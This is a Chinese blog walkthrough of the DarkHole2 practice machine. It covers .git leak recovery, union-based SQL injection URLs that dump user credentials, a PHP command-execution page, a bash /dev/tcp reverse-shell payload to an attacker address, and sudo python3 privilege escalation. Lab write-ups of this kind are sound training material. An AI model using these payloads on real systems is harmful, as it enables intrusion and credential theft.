0
点赞
收藏
分享

微信扫一扫

靶机渗透日记 DarkHole2

大明宫 2022-03-12 阅读 61
  1. 端口
    在这里插入图片描述

  2. 访问 80 端口
    在这里插入图片描述

  3. 目录扫描
    在这里插入图片描述

    发现存在 .git 泄露,登录页面需要输入邮箱及密码,除此之外并没有其他信息

  4. 下载 .git 源码

    wget -r http://192.168.0.134/.git 
    

    在这里插入图片描述

    查看 git 日志

    git log
    

    在这里插入图片描述

    图中显示带有默认凭证的login.php文件

    切换到该版本进行查看

    git checkout a4d9
    

    在这里插入图片描述

    得到账号密码

  5. 登录用户可以发现 URL 中带有参数 id,发现存在SQL注入

    在这里插入图片描述

    http://192.168.0.134/dashboard.php?id=1' order by 7 -- -	//报错
    http://192.168.0.134/dashboard.php?id=1' order by 6 -- -	//正常
    http://192.168.0.134/dashboard.php?id=1' union select 1,2,3,4,5,6 -- -
    

    在这里插入图片描述

    爆数据库

    http://192.168.0.134/dashboard.php?id=-1' UNION  SELECT 1,database(),3,4,5,6  -- -
    

    在这里插入图片描述

    爆表名
    http://192.168.0.134/dashboard.php?id=-1' UNION  SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() -- -
    爆列名
    http://192.168.0.134/dashboard.php?id=-1' UNION  SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='users'-- -
    爆数据
    http://192.168.0.134/dashboard.php?id=-1' UNION  SELECT 1,user,psas,4,5,6 ssh-- -
    

    在这里插入图片描述

    当然也可以使用 sqlmap

    在这里插入图片描述

  6. 登录 shh ,查看用户的 .bash_history 文件

    在这里插入图片描述

    发现目标靶机开启 9999 端口,并且在后台运行

    在这里插入图片描述

    在这里插入图片描述

  7. 访问 index.php

    <?php
    echo "Parameter GET['cmd']";
    if(isset($_GET['cmd'])){
    echo system($_GET['cmd']);
    }
    ?>
    

    可以执行命令,构造payload

    http://127.0.0.1:9999/?cmd=bash -c 'exec bash -i &>/dev/tcp/192.168.0.128/4455 <&1'
    
  8. 在用户 losy 中的 .bash_history 文件中,可以发现该用户密码

    在这里插入图片描述

    并且该用户可以执行 sudo 命令,使用 python3 成功提权到 root

    在这里插入图片描述

举报

相关推荐

0 条评论